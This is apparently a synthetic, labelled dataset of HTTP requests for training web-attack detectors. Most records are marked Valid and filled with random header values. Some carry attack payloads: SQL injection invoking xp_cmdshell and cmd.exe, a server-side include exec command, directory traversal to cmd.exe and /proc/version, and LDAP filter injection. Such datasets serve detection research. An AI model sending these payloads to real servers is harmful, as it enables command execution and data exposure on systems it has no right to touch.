X-Serial-Number: 916219
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eE2kdlrcient3a=CnusotTtot0rneonue&scsuuissd5giAli=f&mg4orl=u?&et8==ls

End - Id: 7072
Start - Id: 4814
class: Valid
PUT /9hsorr5oeyioOyA/sfecnmsrmdecd/s@2TXx6e7/sEzYJ.kLo7vV7Vu/8AYSJoFSw.sh? HTTP/1.1
Content-Length: 285
Content-Language: rrexe,5t8uarb
Content-Encoding: deflate
Content-Location: http://www.tetr.com/vct94er.exe
Content-MD5: dHRvc2MzZnRUN210b25lMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Sep 07 07:05:14 CET
Last-Modified: Wed, 27 Sep 06 24:14:13 UTC
Host: 78.30.51.138:3663
Connection: keep-alive
Accept: audio/x-wav;q=0.1, audio/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: compress, compress, compress, compress;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 230.95.87.197
Cookie: Nkedrop4c=eceraasmsdrnoa;winntMqd=a
Cookie2: $Version="858"
Date: Sat, 03 Feb 07 17:41:30 UTC
ETag: "zmwJ@hqDENwJ-j8"
Expect: 100-continue
From: sgaecwle@tsei.gov
If-Modified-Since: Tue, 19 Jul 05 11:56:47 CET
If-Unmodified-Since: Thu, 31 Dec 09 19:43:45 CET
If-Match: "VYnqOKKhzuuviDlz"
If-None-Match: *
If-Range: "wJgzsG2up0xbXqO@.uzj"
Max-Forwards: 1
MIME-Version: 0.2
Pragma: md='e'
Proxy-Authorization: rat4p uoeGihTn=aNnuf
Authorization: Basic dXlhcmI6aWlldGVpbA==
Range: -302,2-7699
Referer: /lruro/eotEphCc/ryneE7e/jssimh.pdf
TE: trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: m9oohlrEdcAytatthr
UA-CPU: Sparc
UA-Disp: 0621,287,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 904x222
Via: HTTP/8.6 www.E8en.png, FTP/4.4 36.121.60.21
Transfer-Encoding: identity
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 620 www.hJaott.htm "tdmceeeioHsslThg" "Wed, 29 Oct 08 06:51:32 GMT"
X-Forwarded-For: 100.9.171.116
X-Serial-Number: 62979585103179950759
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

1ahn6slnTn=398&eeteNeey=78012&id3NbinYA=ebmailAw0n+p3narcpini&ontlrs87esshshi=6tef&nte165tDia5iaqW=7280454&lfxuiaUstq=ftp1emragiIrdgen&Julogg93Lh.e=621&usrQyb9u-=uoilttooab&anowdgsain=fromefT0&Ih7mashcmo=9490139471&I5nreplaceOzeORbf=0dceetciuudodeg8awgetesfOe&npv=ooi&rearlebAs=rhlib

End - Id: 4814
Start - Id: 30972
class: Valid
GET /n8hh1.hM2OHRFN6V/ifruo/fe2/Wpnh.MQXSselectadminrkRo/1nc/nrvroEE2RT@v0w8i47/hDmed/dCu1im_Yh_0NJ41f/t@Z8o2jkHZ4/IEnartmK.html? HTTP/1.0
Host: 211.240.64.147
Connection: htdnsd7s
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=601
Client-ip: 247.73.147.159
Cookie: sstkatossu3o2N=h7N.Bgj
Cookie2: $Version="339"
Date: Tue, 08 Mar 05 22:04:38 GMT
ETag: "5e_Nr_S.RrEhzGj7@IRz"
Expect: 100-continue
From: grsl@tetg8e3sNy.uk
If-Modified-Since: Wed, 01 Apr 09 23:23:45 CET
If-Unmodified-Since: Tue, 04 May 04 12:47:00 CET
If-Match: "wdHe3UMnh7mOoSZ"
If-None-Match: *
If-Range: "WgLvlCjpzl72dIFYF8@"
Max-Forwards: 4
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: sa9qtC oa7o=iisi1be
Authorization: Digest algorithm=rhwasiea
Range: -998
Referer: /weed/4n53q/t4wa/5taI.dll
TE: trailers,gzip,trailers
Trailer: Via
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 3.0; 6e-ei; rv:0.0.9) Gecko/16376027
UA-CPU: PowerPC
UA-Disp: 6522,303,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 349x4408
Via: uys/3.0 www.ymh7.js, 2.8 28.236.90.11, 5.1 165.245.97.151:20959
Transfer-Encoding: deflate
Upgrade: ehia/0.0, eN7b/7.6
Warning: 455 www.uhaotir.htm:513 "Nuftr" "Sun, 14 Sep 08 14:47:19 GMT"
X-Forwarded-For: 228.18.153.246
X-Serial-Number: 65625
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30972
Start - Id: 23549
class: Valid
GET /nNi/w7aloy0/YgnOceedeRj/90hus4khslvta9n0ep/PzWDo5ja9S/aeu1Dtsjrsul3Dd/nIXL0PbnTrQu7K@vk.js? HTTP/1.0
Host: www.x7h0lnre2k.cz
Connection: Fnhzqea
Accept: image/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ooeje-Ant, mhtbn-gia;q=0.0, Dil-z, 3lhaege-aopa;q=0.3, awdaeast-tQa0tdrq;q=0.4
Cache-Control: no-cache
Client-ip: 186.208.141.68
Cookie: ehllpOlnliurue=havingls:enPjfch;yce=a;eosAapali=ih7Qh_C
Cookie2: $Version="5"
Date: Sat, 29 Aug 09 16:27:18 UTC
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: t2erc=irB5;roAq2sbc
From: otyi@toidujaio.be
If-Modified-Since: Tue, 09 Oct 07 02:38:12 CET
If-Unmodified-Since: Wed, 23 May 07 11:29:45 UTC
If-Match: "yUeeyqQZT4iBi1tvcDW"
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: http://www.eedtdB.cz/erpd/mnpF3/tetqret/sdohrh7s/nqrwaeas.doc
TE: gzip
Trailer: Referer
User-Agent: eoaj3nlnXyNk8e3
UA-CPU: StrongARM
UA-Disp: 295,456,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/6.1 www.mrsotrs.tiff
Transfer-Encoding: compress
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 74768537554574
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23549
Start - Id: 19547
class: Valid
GET /Ay9IzMbmocha9-_Y-65/mcrGItqw17mpkWe/seigatnelaA4rbsram/nnisahg/ar4Iiidnec70/niheSe8fxhe/iAShrehtdHsinrr/Lntdcy7iy/tDywR/hunion1access_logpp-/469eezcamc/toXnrIjoeaei.php?eanjd0tt=iwheresW4&usrxafhwindow.openYDQSQ=%3B%24&ie1=vexecA+tnuwp-e&l3rl=location+atscript&rcirpm84ee=E%3Cmsdivnl7+lx+mwIn+&Q5G3hm=8&ilO24Nejl=349 HTTP/1.0
Host: www.eZ7cue0d.gov
Connection: tfnL0eo
Accept: image/*;q=0.6, audio/basic, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2615
Client-ip: 235.21.176.99
Cookie: uxelenDcSdb=962;b8Wh1i3tinh9a=v;R4il8al9=6768
Cookie2: $Version="4"
Date: Sun, 25 Oct 09 15:23:38 GMT
ETag: "pwhBmkWUsY.qmAUm8"
Expect: 100-continue
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 05 Feb 09 17:52:26 UTC
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: "JVcZynwGilE42jddDrxa"
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: *
Max-Forwards: 8130
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: Basic TjNZbTI6Smw0MW4=
Range: 156-,0-
Referer: /octhRszn/ethj0trr/5yentd/lfcs/marl.mp3
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 4.7; ik-1v; rv:9.9.2) Gecko/20363472
UA-CPU: MIPS
UA-Disp: 146,7651,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 690x0416
Via: 6.7 34.137.51.236, 8.4 www.snianlGn.tiff
Transfer-Encoding: gzip
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 00842
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19547
Start - Id: 38308
class: LdapInjection
GET /vhEtj63yFo/H5INUeGSn3/dntpd/xjLzPVbXF@K/dZ28TQF/Mv%u9roHMI9X3O/PAf-N/wMRj267X/sd0AH/xLtJS4/ai/4sEttOs.swf?ekt8otkrcs=Fscript5n&n8aes=0479&nhnrtsy78=eiovrre%2Bo%3B%3Ami&Doeodmed=o8z&i5yCia2rUd=220744&DL6log=4CCfL03v&redyeudceuei=0&eti=25&mj2sh=tlw&idwzs=cleNo%29%28++%7C++++%28n2l%3D*%29&semyoqt=9685375&iWcUcpasswd=eans&7p1s4qbe=cf5mperli9rnw6r&riwohM1nd4crsbn=9337247525&cTia=v HTTP/1.0
Host: 18.250.111.140
Connection: ndbo6
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.6, deflate, deflate, deflate
Accept-Language: ts-Ut;q=0.6, i-tIh, sktwna-Inm;q=0.7, iswU-die, me-tll;q=0.4
Cache-Control: no-store
Client-ip: 179.76.26.194
Cookie: ehslky=autoexecsatq4Uias0Y4;2TSaltea8acaa=Ahabiezrtk;-OyzZeuwinnt=1721;ws7zwxtn=cZK
Cookie2: $Version="14"
Date: Wed, 03 Dec 08 01:48:23 CET
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: k3ilm
From: ctbt@euirsarao.st
If-Modified-Since: Thu, 29 Jun 06 02:16:43 CET
If-Unmodified-Since: Sat, 14 Jun 08 15:59:27 CET
If-Match: "WebLFRFuOabtG2s578qx"
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 44
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest nc=dFD6214b
Range: 529307-,-0
Referer: /Sbxri/mstghNt/yHht/iwlso.cgi
TE: deflate;q=0.4,trailers
Trailer: Pragma
User-Agent: Mozilla/1.0 (Windows; U; Win98 3.0; iq-ld; rv:9.7.4) Gecko/58199437
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 9.1 www.hnmbaE.jpg:0, 0.6 www.Jadrrhii.tiff:0
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 38308
Start - Id: 30319
class: Valid
GET /oO-k.fybXA825/rnr5ioher3eSbTkh/yBRXZmTpydwp4Z@bxi/fachunhmvgcsNeiiy8/oiewwtlIR5tnglltuy6/eS0elnefsicron4mbxsb.shtml?jM8style79w7h7=0603882&OnILa9=8276&chu=%7C%7Csv+c%24rsstEthhdo&PWndeorhnubara=t0rlUILpXb&rubuen9ndniep=854614445&r8Hjmal=1&b9ensshuif=iidoR8ytir6e&iimezoddoiieae=648603695&Dk1mn=y8ZZbNF&linkxJ1MiTyBfly=9oscriptqupheoq%27vf&uoge8lne=%3F2uamrroftrmsu&IqYyP=otane&svaiPi3qndyfbr=uM8n4v10PO&eodnpduav5nt=14263265 HTTP/1.0
Host: 140.167.246.210
Connection: keep-alive
Accept: application/x-tar;q=0.2, text/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=2693
Client-ip: 158.8.64.9
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Fri, 02 Feb 07 14:33:21 GMT
ETag: W/"uaTGlGF-qbMung2oH"
Expect: 100-continue
From: eredri@rnloehihom.net
If-Modified-Since: Tue, 01 Feb 05 01:12:41 UTC
If-Unmodified-Since: Mon, 13 Feb 06 04:25:28 UTC
If-Match: *
If-None-Match: "9rDgYQMSVuflBC8Mih"
If-Range: *
Max-Forwards: 1456
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: NTLM ZXRpdHRhY2VuZWlnb2FTZHJlMmNvZWRTYWtpZWx2cm9hZGxtaTEydGI=
Range: 3-440226,69-6
Referer: http://eyapnjow.cz/ett0/orch5jnt/acmeedt/aesixcr.asmx
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 7.6; t2-st; rv:6.6.2) Gecko/59308242
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3971x442
Via: 9.4 www.benIrfo.css, 1.9 24.158.30.66
Transfer-Encoding: netl
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30319
Start - Id: 40092
class: SSI
GET /O_vDcmd72/oUI6iIxgbLIVMW/childechoj/i4oeyse/e5ce/iyxuntdesmy1teHt/pRKew5pdKspuepOVGvm/FPxtermIH/xs2hrmx2e4dh/sRg0azZF5Suhtaccesw/oj.mdb?u2sfae8=9157&ez6p=RSrdTontut&nyeenes=s%3DnBdxxh&nan9gi4tdjl=uh%26%3Fa3%2FA&ai=xO&oEujwttfHeti6oj=%25uhp6nrp%5Clo&7usn=thF&AtSz=ir&lir=03710&cfedn6eeXclss=70343318&htechnneuC=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Ftl%2Fnoix%22+++++--%3E HTTP/1.0
Host: 5.12.247.5
Connection: anleitn
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 221.230.41.62
Cookie: iitohdixt=netcatphpjs sodt(rgiH?i;oeyetrlJmyog=rD;sEus4=rmd6uyneeeujo;tsadr=o6;jk4vjot0r=8
Cookie2: $Version="585"
Date: Mon, 12 Oct 09 01:36:02 GMT
ETag: "SadNG8P.EPu@j4T"
Expect: tslD=cua4;iiit=tpIAwosc
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Fri, 29 Jan 10 11:10:10 CET
If-Match: *
If-None-Match: "CPj4MReygrS5Cjpl4"
If-Range: Wed, 17 Sep 08 10:43:19 UTC
Max-Forwards: 199
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: http://www.eeao.fr/Dztiaaad/81nr.rar
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/5.8 (compatible; Konqueror/0.6; Linux i386; othjam1t; teT6ktc)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40092
Start - Id: 41100
class: SqlInjection
GET /9JJOMe35NIr5R/Md7q6phpYh6IX/01acceptEWiP/358_YnFCKwgDpaKTaR/@dhttpQ3styled/eierksena/mse0qniicnvooedyOx/nnoMTzy@Im/15/rWt%uwindow.openb1tmpjd/ebeliisffH2OUTmd.dll?naghrmEsn6wtrot=t%29AdlYeEr&ReaileesQmii=mbeieia&mamltnLien=eni7aegeiid+waviewget&7Ogn=7ohfpatltuocner&9ra3rhzra=eu%7Ef&atn7ltrtasehde=%27%3BEXEC+++++master.dbo.xp_cmdshell+++++%27cmd.exe&nhin=e8%3D&ebaeeaRiotoot=nJk&RIbetweenK=lwlEa&rxs=2346&Htejac=t.lK0V4H&Upa=6&5amefeet1i=soS%3ATrhxml%3D2lth HTTP/1.1
Host: www.Colt.fr:4
Connection: eeuytsst
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 26.15.87.96
Cookie: gn5i=a;1nbe7jbmo=oocia;i0Aaetnahhb=s Kj;R4TandTFQEK=>ta9ecel0;cob8dd5y=briActtpolgedimc;aweugrd=shtpassng'ssm?haoca
Cookie2: $Version="397"
Date: Thu, 18 Oct 07 03:30:25 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Wed, 20 Jan 10 15:20:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: eotpD tuweeo=plts5pr
Range: -397
Referer: http://a3rc.biz/ewene.nsf
TE: trailers,chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.0 (compatible; meT7saIu; Win 9x; k7ohsiredr; nwnuiatl; hs9e)
UA-CPU: PowerPC
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: lcs/0.1 www.ygpnj.jpg, FTP/9.6 www.b748lnm.js
Transfer-Encoding: proa2
Upgrade: rsie/6.2, ped/8.7, tlgq/8.5, FsiO/2.3
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41100
Start - Id: 21873
class: Valid
GET /ioQ__v59/aTs/tts/ah/ayldc97MYb/8vEb4kOKO0.msf?fL=213379&rhnYydi4eshd=m HTTP/1.1
Host: 95.243.101.238
Connection: sottdu
Accept: */*;q=0.8
Accept-Charset: euc-jp;q=0.7, hz-gb-2312, iso-8859-8-i;q=0.2, x-mac-ce;q=0.8, ks_c_5601-1987
Accept-Encoding: compress;q=0.7, identity;q=0.2, compress, compress;q=0.8
Accept-Language: *;q=0.9
Cache-Control: max-age=81
Client-ip: 124.23.154.34
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="53"
Date: Sun, 06 Feb 05 24:34:44 GMT
ETag: "s9YaKD-sFwJHQ94s"
Expect: Idr4oo=neMZhs;hco8c4ez=Ri9apu3l
From: flsotah@c3jv.uk
If-Modified-Since: Thu, 15 Jul 04 04:15:08 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:21:11 CET
If-Match: "xzg7ytI@BD3vP3QjY"
If-None-Match: "yeHjVFiVUETumXdb75NH"
If-Range: Tue, 30 Jan 07 19:11:06 UTC
Max-Forwards: 5
MIME-Version: 2.2
Pragma: slccnN=tuiys
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: fn3A oquea=azen
Range: -34244,001-
Referer: /np3e/h7ietu/hdo7b8d/mXzeue.php
TE: gzip,trailers
Trailer: Upgrade
User-Agent: nokgzhdtsd3re
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: rAhTe/3.1 www.tmea.gif, 9.2 www.bott.png, 4.4 www.neGnd.jpg:9
Transfer-Encoding: identity
Upgrade: foarn/6.0
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21873
Start - Id: 43848
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 193.120.84.179
Connection: keep-alive
Accept: audio/*, video/quicktime;q=0.6, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=597
Client-ip: 59.162.229.57
Cookie: eaTe2nusrid=setmlcmdTObjeeqP;lns2eoheni8hB=62988468
Cookie2: $Version="07"
Date: Sat, 19 Nov 05 11:46:27 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Sun, 04 Jul 04 24:36:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 3
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Basic bEx1ZWN0TjpudGFsZQ==
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: /uhlis/eoolpat/aes2/iIc1t8.png
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 1.3; in-bh; rv:8.9.2) Gecko/99719465
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43848
Start - Id: 22266
class: Valid
GET /a4Dbs/rb_VPDHv2nDOn4t3M@/cemmwLsri3df1t/xFJTgEHO/hsn/nnB3E@VeC1access_logbin-style/ub9ertscy4manex/eY3_uoYqsFF/lkeqwdnsen/balo/ewnai.shtml?a8n9oh=nsm&nhtndtqu59tetS=a7dleyreab&hgtur=8334&7klee9ioi1sl=57&orsnuIhqou5eD=7310906&gFremtdiadtgsh=ns&itaiwhtrtspirnz=h&KFaccess_logzTAmQVnyR=qc2&Z@D8OAqzcatGhm=2960701048&fqUyzcWpF=iforpeezo8Le4br&otea=h&woeaioeqir5A=4a2hV5&iysoacnndytxr=0 HTTP/1.1
Host: www.ew0atoI.net
Connection: uaaa
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: e-zn8es
Cache-Control: only-if-cached
Client-ip: 215.189.117.126
Cookie: rI5aiuwtnA1tdtr=semod;cw=658898382;npelbleeo=12;ynrcus=4;wh5eed=Tud;3vjaGcYp6L=39161
Cookie2: $Version="6"
Date: Tue, 28 Mar 06 08:43:30 UTC
ETag: W/"-_f0WtVP5jXeAjP"
Expect: oz0Ted=ierRlone
From: orEtts@ismhaeter.de
If-Modified-Since: Sat, 05 Dec 09 04:36:46 GMT
If-Unmodified-Since: Wed, 25 Feb 09 13:43:40 CET
If-Match: *
If-None-Match: "wEZdj8rB7OKRI.hxs4s"
If-Range: Tue, 30 Jun 09 17:43:47 CET
Max-Forwards: 75
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://Fgi8he.org/solt1orn/naghniat/r1tfe/sEaetih.jpeg
Range: 187831-,-728581,-573791
Referer: /owtihln/xtyymE/eEbre.jpg
TE: trailers
Trailer: From
User-Agent: Mozilla/6.7 (compatible; gecteco; WinNT; gutb6eg; Hsmepkr; ivasn)
UA-CPU: MIPS
UA-Disp: 0876,9361,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8023x069
Via: FTP/6.1 www.nu4eusae.gif, 8.5 192.102.42.50, FTP/6.0 www.tulhn.html:861
Transfer-Encoding: rt4O; teitRog=stgeafha
Upgrade: irahX/5.4, ar3e/6.1, neltc/9.8
Warning: 967 240.225.47.66:3503 "oene7icne5sdt6" 
X-Forwarded-For: 87.182.52.50
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22266
Start - Id: 46178
class: PathTransversal
GET /eiei0aebartw/pOeid5tmeha/cecqtesevb4nS.gif?GFD4T=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&iodditniheoooac=bidi HTTP/1.0
Host: www.ngec60s.biz
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: ytap=netWrsmt
Client-ip: 216.152.218.95
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="18"
Date: Sun, 23 Sep 07 18:31:52 GMT
ETag: "hgS4mgI8rGzEY4sN"
Expect: cedee3w=dlwMc;pae5ufla=teioH
From: T6case6b@eeystktA.net
If-Modified-Since: Thu, 16 Apr 09 21:00:43 GMT
If-Unmodified-Since: Wed, 17 Aug 05 04:21:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7641
MIME-Version: 6.1
Pragma: jh1=jkrmell
Proxy-Authorization: Basic b2FpWVRubTplaWxlOXg=
Authorization: Basic bWY0QXA6cm5zSnN3aWY=
Range: -423
Referer: /ihddl/ht8eH/aionF.aspx
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Ealltra (c.KlQjp; gCWUxw_X; dJUROIliU; hyp_EW-fX)
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 58.123.140.202, 2.9 www.erubl.html
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 292 www.tdsirTm.jpg "oohoctsorndn" "Tue, 29 Dec 09 06:05:50 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46178
Start - Id: 9339
class: Valid
GET /osr7ymelp/cuMuB7WnGMJGz/h322lOu/i4lCiNW0Hj.miUI52C/bwJgj/So2atunaadcrjnnCoton.mspx?Lmbtmpd8xBLIts=t0CJN71T&iue=pemeb4hnetcat HTTP/1.1
Host: 105.147.180.19
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t4ejt-h1d;q=0.6, eh-sqiv;q=0.5, hEewxedi-sR
Cache-Control: no-cache
Client-ip: 216.113.175.44
Cookie: paaoai=451758113;oo=Nywctqa1mnHyLsfrr;ihorh0huMCdc=ioGaI;dYdopenmYO=89154
Cookie2: $Version="6"
Date: Sat, 16 Jun 07 02:08:06 GMT
ETag: "EoKCZVJzOT0CrUv9L"
Expect: 100-continue
From: hwtSu76@kdazi.net
If-Modified-Since: Fri, 27 Aug 04 23:54:11 GMT
If-Unmodified-Since: Thu, 18 Nov 04 20:42:41 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Nov 09 04:03:08 UTC
Max-Forwards: 561
MIME-Version: 3.5
Pragma: eseXs='pams'
Proxy-Authorization: ud0w tNdb=terh
Authorization: Digest uri=/epUaQday/ca0lim/ferE/edttiwtt.asp
Range: -41,91189-8,552-
Referer: http://www.MaQad.fr/5taaee/io01wueC/80arEsei.msf
TE: gzip;q=0.1
Trailer: Accept-Charset
User-Agent: 84aaneopri/1.3.6.1
UA-CPU: 68000
UA-Disp: 366,9713,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4908x484
Via: HTTP/6.0 71.124.79.148:0486, HTTP/8.8 249.170.184.12
Transfer-Encoding: compress
Upgrade: fig/5.8, tNrm/6.1, astn/5.2, txry/4.5
Warning: 709 17.102.2.9 "acKn" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 25991136189535
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9339
Start - Id: 12481
class: Valid
